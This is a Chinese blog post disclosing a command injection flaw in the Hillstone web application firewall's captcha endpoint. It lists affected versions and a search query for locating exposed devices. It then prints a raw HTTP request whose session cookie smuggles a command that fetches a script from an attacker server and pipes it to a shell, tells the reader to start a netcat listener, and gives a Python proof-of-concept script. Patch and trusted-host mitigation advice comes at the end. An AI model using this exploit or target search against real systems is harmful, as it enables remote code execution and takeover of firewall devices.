山石网科应用防火墙WAF命令注入

iSee857

已于 2024-08-27 08:58:26 修改

阅读量188

点赞数 6

文章标签： web安全

于 2024-08-26 16:05:15 首次发布

本文链接：https://blog.csdn.net/xc_214/article/details/141566415

版权

0x01 漏洞描述：

山石网科 Web 应用防火墙（WAF）是专业智能的Web 应用安全防护产品，在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术，帮助用户轻松应对应用层风险，确保网站全天候的安全运营。

在WAF的验证码页面，存在命令注入漏洞，恶意攻击者可通过构造恶意请求，拼接命令执行任意代码，控制服务器。

0x02 影响版本：

5.5R6-2.6.7~5.5R6-2.8.13

0x03 搜索语句：

icon_hash="-839455805"

0x04 漏洞复现：

GET /rest/captcha HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Accept-Encoding: gzip, deflateAccept: */*Connection: closeAccept-Language: en;q=0.9
Cookie: PHPSESSID=aaaaaaaaaa%3bcurl${IFS}vps-ip:9999/cccc|sh%3bd

开启vps nc监听

网传poc检测脚本如下：

import requests,sys
requests.packages.urllib3.disable_warnings()
session = requests.Session()

target = "https://192.168.247.196/".strip("/")
cmd="curl\x24{IFS}192.168.247.1:9999/cccc|sh"
url = target+"/rest/captcha"
headers = {"Accept":"*/*","User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Accept-Language":"en;q=0.9"}
sss=requests.get(url,headers=headers,verify=False)

if "PNG" not  in sss.content:
    print("target not vuln")
    sys.exit()




cookies = {"PHPSESSID":"aaaaaaaaaa%3b"+cmd+"%3bd"}
try:
    response = session.get(target+"/rest/captcha", headers=headers, cookies=cookies,verify=False,timeout=5)
except requests.exceptions.ReadTimeout:
    print("payload work")
    sys.exit()

print("payload send!")

0x05 修复建议：

WAF升级至5.5R6-2.8.14或更高版本

缓解措施：

登录WAF系统后，依次进入“系统”->“设备管理”->“可信主机”，点击“新建”；
选择匹配类型为“IPv4”或“IPv4&MAC”；
设置IP类型为“IP地址和掩码”，输入您的可信IP地址；
选择登录类型为“HTTPS”。

iSee857

关注

6
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
山石网科应用防火墙WAF命令注入

山石网科 Web 应用防火墙（WAF）是专业智能的Web 应用安全防护产品，在Web资产发现、漏洞评估、流量学习、威胁定位等方面全面应用智能分析和语义分析技术，帮助用户轻松应对应用层风险，确保网站全天候的安全运营。在WAF的验证码页面，存在命令注入漏洞，恶意攻击者可通过构造恶意请求，拼接命令执行任意代码，控制服务器。登录WAF系统后，依次进入“系统”->“设备管理”->“可信主机”，点击“新建”；选择匹配类型为“IPv4”或“IPv4&MAC”；选择登录类型为“HTTPS”。开启vps nc监听。
复制链接

扫一扫